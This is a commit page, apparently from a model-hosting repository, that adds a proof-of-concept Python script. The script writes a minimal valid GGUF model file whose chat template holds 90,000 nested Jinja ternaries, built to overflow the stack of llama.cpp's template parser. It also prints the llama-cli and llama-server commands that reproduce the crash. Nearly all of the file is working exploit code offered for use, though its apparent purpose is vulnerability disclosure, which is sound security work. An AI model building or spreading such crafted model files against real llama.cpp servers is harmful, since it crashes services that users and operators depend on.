salvepilo committed on
Commit
2bcc7c3
·
verified ·
1 Parent(s): ddf730e

Add PoC generator script

Browse files
Files changed (1) hide show
  1. craft_full_gguf_poc.py +120 -0
craft_full_gguf_poc.py ADDED
@@ -0,0 +1,120 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: Stack Overflow in llama.cpp Jinja Parser via Malicious GGUF Chat Template
4
+
5
+ Creates a minimal but valid GGUF model file with a deeply nested Jinja chat
6
+ template that causes a stack overflow (SIGSEGV) when parsed by llama.cpp.
7
+
8
+ Vulnerability: Unbounded recursion in parse_if_expression()
9
+ File: common/jinja/parser.cpp, line 336
10
+ """
11
+
12
+ import numpy as np
13
+ from gguf import GGUFWriter
14
+ import os
15
+
16
def generate_malicious_template(depth=90000):
    """Build a Jinja expression containing *depth* nested ternaries.

    Returns ``{{ x0 if c0 else x1 if c1 else ... 'end' }}``: each
    ``a if b else`` level forces one more recursive call in the target
    parser, so a large depth exhausts the parser's stack.
    """
    nested = "".join(f"x{i % 10} if c{i % 10} else " for i in range(depth))
    return "{{ " + nested + "'end' }}"
23
+
24
def create_minimal_llama_gguf(output_path, chat_template, arch="llama"):
    """Write a minimal but loadable GGUF model that embeds *chat_template*.

    Emits tiny llama-architecture hyperparameters, a 32-token dummy
    tokenizer, the supplied chat template, and a single zero-weight
    transformer layer — just enough metadata/tensors for llama.cpp to
    accept the file and reach the Jinja template parser.
    """
    writer = GGUFWriter(output_path, arch)

    # Tiny hyperparameters — smallest values the loader will accept.
    embd = 32       # embedding width
    heads = 4       # attention heads
    kv_heads = 4    # KV heads (no GQA)
    layers = 1      # single transformer block
    ff = 64         # feed-forward width
    vocab = 32      # vocabulary size
    ctx = 128       # context length
    head_dim = embd // heads

    writer.add_context_length(ctx)
    writer.add_embedding_length(embd)
    writer.add_block_count(layers)
    writer.add_head_count(heads)
    writer.add_head_count_kv(kv_heads)
    writer.add_feed_forward_length(ff)
    writer.add_vocab_size(vocab)
    writer.add_layer_norm_rms_eps(1e-5)
    writer.add_rope_dimension_count(head_dim)

    # Tokenizer metadata — placeholder tokens, required for model loading.
    writer.add_tokenizer_model("llama")
    writer.add_token_list([f"tok_{i}".encode() for i in range(vocab)])
    writer.add_token_scores([0.0] * vocab)
    writer.add_token_types([0] * vocab)
    writer.add_bos_token_id(0)
    writer.add_eos_token_id(1)

    # THE MALICIOUS CHAT TEMPLATE
    writer.add_chat_template(chat_template)

    # Minimal tensor set: fp16 zero matrices, fp32 unit norm vectors.
    # Order matters only in that it matches the original writer sequence.
    tensors = [
        ("token_embd.weight", np.zeros((vocab, embd), dtype=np.float16)),
        ("output_norm.weight", np.ones(embd, dtype=np.float32)),
        ("output.weight", np.zeros((vocab, embd), dtype=np.float16)),
        ("blk.0.attn_norm.weight", np.ones(embd, dtype=np.float32)),
        ("blk.0.attn_q.weight", np.zeros((embd, embd), dtype=np.float16)),
        ("blk.0.attn_k.weight", np.zeros((kv_heads * head_dim, embd), dtype=np.float16)),
        ("blk.0.attn_v.weight", np.zeros((kv_heads * head_dim, embd), dtype=np.float16)),
        ("blk.0.attn_output.weight", np.zeros((embd, embd), dtype=np.float16)),
        ("blk.0.ffn_norm.weight", np.ones(embd, dtype=np.float32)),
        ("blk.0.ffn_gate.weight", np.zeros((ff, embd), dtype=np.float16)),
        ("blk.0.ffn_up.weight", np.zeros((ff, embd), dtype=np.float16)),
        ("blk.0.ffn_down.weight", np.zeros((embd, ff), dtype=np.float16)),
    ]
    for name, data in tensors:
        writer.add_tensor(name, data)

    writer.write_header_to_file()
    writer.write_kv_data_to_file()
    writer.write_tensors_to_file()
    writer.close()

    size = os.path.getsize(output_path)
    print(f"[+] Created: {output_path}")
    print(f"[+] Size: {size} bytes ({size/1024:.1f} KB)")
100
+
101
if __name__ == "__main__":
    import sys

    # Fix: the original hard-coded a user-specific absolute path
    # ("/Users/eltarne/..."), which breaks on any other machine. Default
    # to a "gguf_poc" directory next to this script, overridable via the
    # first CLI argument.
    default_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "gguf_poc")
    output_dir = sys.argv[1] if len(sys.argv) > 1 else default_dir
    os.makedirs(output_dir, exist_ok=True)

    # Crash threshold is ~87150 on macOS 8MB stack
    # Use 90000 to ensure crash on all platforms
    depth = 90000

    print(f"[*] Generating malicious chat template (depth={depth})...")
    template = generate_malicious_template(depth)
    print(f"[*] Template size: {len(template)} bytes")

    output_path = os.path.join(output_dir, "poc_crash_model.gguf")
    print(f"[*] Creating malicious GGUF model...")
    create_minimal_llama_gguf(output_path, template)

    print(f"\n[+] To reproduce the crash:")
    print(f"[+] llama-cli -m {output_path} --jinja -p 'hello'")
    print(f"[+] llama-server -m {output_path} --jinja")
    print(f"[+] Expected: Segmentation fault (stack overflow in Jinja parser)")